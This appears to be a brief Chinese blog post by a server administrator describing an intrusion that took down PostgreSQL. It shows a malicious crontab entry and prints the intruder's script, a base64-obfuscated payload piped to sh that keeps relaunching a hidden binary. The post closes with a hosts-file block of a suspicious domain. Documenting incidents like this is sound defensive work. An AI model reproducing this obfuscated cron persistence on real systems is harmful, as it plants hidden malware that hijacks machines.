今天postgresql 的服务挂了,查看进程:
查看定时任务
[root@localhost ~]# crontab -l
* * * * * /sbin/upd >/dev/null 2>&1
查看入侵脚本内容:
[root@localhost ~]# cat /sbin/upd
#!/usr/bin/env bash
echo 'IyEvYmluL3NoCmlmIHRlc3QgLXIgL3NiaW4vaW5pdGN0MTsgdGhlbgpwaWQ9JChjYXQgL3NiaW4v
aW5pdGN0MSkKaWYgJChraWxsIC1DSExEICRwaWQgPi9kZXYvbnVsbCAyPiYxKQp0aGVuCnNsZWVw
IDEKZWxzZQpjZCAvc2JpbgouL21rZTNmcyAmPi9kZXYvbnVsbApleGl0IDAKZmkKZmkK' | base64 -d | sh
原来长这样:
还有
暂时解决办法
vim /etc/hosts
123.123.123.123 www.tionhgjk.com
坐等硬件防火墙的到来。。。。